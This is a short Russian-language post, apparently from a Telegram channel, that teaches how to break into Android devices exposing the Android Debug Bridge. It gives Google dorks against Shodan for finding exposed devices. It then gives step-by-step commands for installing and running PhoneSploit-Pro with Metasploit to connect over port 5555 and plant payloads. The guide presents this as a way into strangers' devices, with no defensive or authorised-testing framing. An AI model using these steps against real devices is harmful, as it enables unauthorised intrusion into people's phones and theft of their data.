ADB (Android Debug Bridge) | Проникновения в Андроид устройства.
Автор - https://admpanel_s.t.me Автор - https://admpanel_s.t.me Автор - https://admpanel_s.t.me
1. Что такое ADB (Android Debug Bridge) -
Android Debug Bridge — это инструмент программирования, используемый для отладки устройств на базе Android. Daemon на устройстве Android подключается к серверу на хост-компьютере через USB или TCP, который подключается к клиенту, используемому конечным пользователем, через TCP.
2. Поиск уязвимых устройств -
Google dork'и для поиска уязвимых устройств:
site:shodan.io intext:"Android Debug Bridge"
site:shodan.io intext:ADB
3. Эксплуатация уязвимости -
Для эксплуатации нам понадобится PhoneSploit-Pro (кликабельно).
PhoneSploit-Pro - это инструмент который может автоматически создавать, устанавливать и запускать полезную нагрузку на уязвимом устройстве с открытым TCP портом 5555.
Для подключения уязвимого устройства выполните следующие действия:
- Установите модуль для python NMAP (
pip install python-nmap==0.7.1
) - Установите ADB & scrcpy (
sudo apt install scrcpy && sudo apt install android-tools-adb
) - Установите Metasploit (ойляя тут гугл в помощь)
- Запустите PhoneSploit-Pro (
python3 phonesploitpro.py
) - После нажмите клавишу „1“ и укажите IP-адрес уязвимого устройства.
- Если написало „connected to {ip}:5555“ то вы подключились успешно!